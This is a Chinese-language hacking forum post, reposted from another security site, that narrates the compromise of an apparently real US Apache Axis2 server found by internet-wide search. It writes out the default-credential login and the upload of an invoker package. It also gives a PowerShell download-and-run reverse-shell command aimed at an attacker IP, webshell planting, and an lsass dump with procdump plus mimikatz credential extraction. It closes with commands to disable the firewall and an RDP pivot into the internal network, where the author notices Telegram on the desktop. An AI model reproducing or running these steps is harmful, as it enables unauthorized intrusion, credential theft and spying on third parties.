標題:繞過殺軟拿下目標站

taibeihacker

Moderator

0x01 目标​

country='US' app='APACHE-Axis'從老洞撿些漏網之魚,沒準還會有意外收穫
1049983-20220112164702590-1914940666.png

目標出現
1049983-20220112164703269-409796320.png

還是熟悉的頁面,熟悉的端口
然後嘗試默認口令登錄,ok, 這下穩了
1049983-20220112164703784-492837324.png

先蒐集一下信息
1049983-20220112164704428-1031611363.png

不要上來就部署包,先看一下現有的服務,像這種弱口令的基本上99.9999%都已經被人搞過了
1049983-20220112164704943-1143663517.png

1049983-20220112164705503-859439348.png

再上傳包就多此一舉了,可以直接利用
找了一圈沒發現遺留的馬兒
找絕對路徑自己上傳
C:/elocker/webapps/admin/WEB-INF/classes
1049983-20220112164705932-1966461831.png

順手一測,竟然可以出網,也不需要傳shell了,直接掏出cs
1049983-20220112164706379-551799478.png

執行命令
1049983-20220112164707036-902281158.png

看結果失敗了

0x02 反弹shell​

難道是因為在url裡執行,導致powershell命令沒有執行成功嗎?
帶著這個疑問反彈shell嘗試一下
1049983-20220112164707518-742169218.png

1049983-20220112164707971-2053066810.png

結果還是失敗,可以確定,應該是有waf

0x03 写入shell​

x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txtpath=C:\elocker\webapps\admin\axis2-web\shell.jsp
1049983-20220112164708430-796309663.png

1049983-20220112164708961-1830718985.png

查看一下進程
1049983-20220112164709700-431368973.png

通過對比發現某安全衛士
1049983-20220112164710274-561240991.png

0x04 绕过杀软​

通過測試發現,最基本的net user也執行不了
擺在面前的路只有2條
做免殺抓密碼果斷選擇抓密碼,簡單有效。
mimikatz不免殺不可直接用
這裡我利用procdump把lsass進程的內存文件導出本地,再在本地利用mimikatz讀取密碼
上傳procdump64.exe 並下載lsass.dmp
1049983-20220112164710740-364111678.png

1049983-20220112164711227-614035489.png

再在本地解析文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 導出為lsass.dump文件
mimikatz.exe 'sekurlsa:minidump lsass.dmp' 'sekurlsa:logonPasswords full' exit
# 把lsass.dmp放在mimikatz目錄利用
1049983-20220112164711763-157868246.png

得到hash,破解密碼
1049983-20220112164712218-2039058059.png

0x05 登录服务器​

查看防火牆狀態
Netsh Advfirewall show allprofiles關閉防火牆
NetSh Advfirewall set allprofiles state off
1049983-20220112164712683-3724176.png

1049983-20220112164713102-414798445.png

內網IP,需搭建代理
1049983-20220112164713537-195359877.png

1049983-20220112164713911-848756372.png

1049983-20220112164714273-555776031.png

0x06 登录云桌面,发现意外惊喜​

發現機主運行了telegram,嘿嘿
1049983-20220112164714865-1133025225.png

1049983-20220112164716092-1085897559.png

1049983-20220112164716924-903276189.png

0x07 总结​

1.通過fofa的語法country='US' app='APACHE-Axis'進行搜索漏洞目標2.發現存在一個axis2的後台,該頁面存在弱口令(admin/axis2)3.在後台處的upload sevice處上傳AxisInvoker.aar包4.查詢到網站的絕對路徑為:C:/elocker/webapps/admin/WEB-INF/classeshttp://www.xxx.com/axis2/services/AxisInvoker/info5.嘗試通過cs生成posershell後門程序,通過訪問下面地址觸發,但是訪問失敗(可能係統中存在殺軟攔截了)http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/s...voke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=dir%20C:6.通過下載文件方式寫入大馬http://www.xxx.com/axis2/services/A...angyu.exe(安全衛士)8.在大馬中上傳冰蠍的一句戶話木馬,然後連接,執行命令net user出錯。 9.這里通過冰蠍上傳procdump64.exe,並執行命令導出lsass.dmpprocdump64.exe -accepteula -ma lsass.exe lsass.dmp10.通過冰蠍下載lsass.dmp到本地。 11.通過mimkiatz導入lsass.dump並讀取出hash值mimikatz.exe 'sekurlsa:minidump lsass.dmp' 'sekurlsa:logonPasswords full' exit12.通過md5破解網站對HSAH值進行NTML破解,並成功破解出密碼:123QWEqwe13.通過大馬執行以下命令Netsh Advfirewall show allprofiles //查看防火牆狀態NetSh Advfirewall set allprofiles state off //關閉防火牆14.通過冰蠍自帶的socke功能開啟代理,本地設置Proxifier代理將MSTSC添加到代理中15.通過代理執行mstsc,遠程桌面登錄內網,桌面發現存在telegram原文鏈接:https://xz.aliyun.com/t/9856
 
返回
上方